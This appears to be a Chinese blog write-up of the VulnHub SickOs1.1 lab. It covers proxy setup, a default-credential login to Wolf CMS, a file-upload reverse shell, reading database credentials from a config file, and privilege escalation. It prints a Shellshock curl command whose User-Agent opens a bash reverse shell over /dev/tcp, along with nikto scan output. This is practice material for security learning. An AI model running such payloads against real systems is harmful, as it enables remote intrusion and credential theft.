• vulnhub--SickOs1.1


    SickOs1.1

    运行环境VMwrae,Nat模式

    攻击机:kali

    主机发现

    20200619132613

    端口信息收集

    20200619134641

    显示使用的代理,我们要访问Web页面需要设置代理

    火狐设置代理

    20200619135437

    可以正常访问了

    20200619135556

    访问robots.txt文件

    20200619140525

    访问这个cms

    20200619140723

    百度得到默认后台地址,http://192.168.145.138/wolfcms//?/admin/弱口令admin:admin登录

    20200619141545

    Wolf CMS 0.8.2以及之前版本中存在文件上传漏洞

    20200619142811

    获取反弹shell

    上传一个反弹shell

    20200619150526

    kali监听4444端口,访问反弹shell

    20200619150925

    有python环境,将shell改为交互shell

    20200619152750

    查看网站配置文件

    20200619152646

    获得数据库账户密码

    define('DB_USER', 'root');
    define('DB_PASS', 'john@123');
    

    提权

    查看/etc/passwd文件,发现sickos用户可以登录

    20200619153138

    使用sickos提权

    20200619154918

    20200619155040

    后记

    还有一种反弹shell方式(CVE-2014-6278)

    
    root@kali:~# curl -x http://192.168.145.138:3128 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.145.137/444  0>&1" http://192.168.145.138/cgi-bin/status
    
    

    20200619163623

    root@kali:~# nikto -h 192.168.145.138 -useproxy http://192.168.145.138:3128
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.145.138
    + Target Hostname:    192.168.145.138
    + Target Port:        80
    + Proxy:              192.168.145.138:3128
    + Start Time:         2020-06-19 13:43:24 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.2.22 (Ubuntu)
    + Retrieved via header: 1.0 localhost (squid/3.1.19)
    + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
    + Uncommon header 'x-cache' found, with contents: MISS from localhost
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 08:35:02 2015
    + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + Uncommon header 'tcn' found, with contents: list
    + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
    + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
    + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true
    + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
    + 8726 requests: 0 error(s) and 15 item(s) reported on remote host
    + End Time:           2020-06-19 13:43:59 (GMT8) (35 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    
    

    参考连接

    https://blog.csdn.net/qq_34801745/article/details/103918395

    https://www.anquanke.com/vul/id/1123284

  • 相关阅读:
    Linux每日一题——(2)vi文本编辑器
    Oracle每日一题——(1) 启动/停止监听
    Linux每日一题——(1)创建和删除用户
    Oracle实践:00600[4193]错误导致服务频繁宕掉问题
    在AX中生成二维码
    AX向在线用户发送消息
    TimeNow()获取时间与当前时间不符
    Changecompany中使用Box,Info等客户端方法后出错
    AX4.0删除引用
    poj1010解题报告
  • 原文地址:https://www.cnblogs.com/JKding233/p/13164602.html
Copyright © 2020-2023  润新知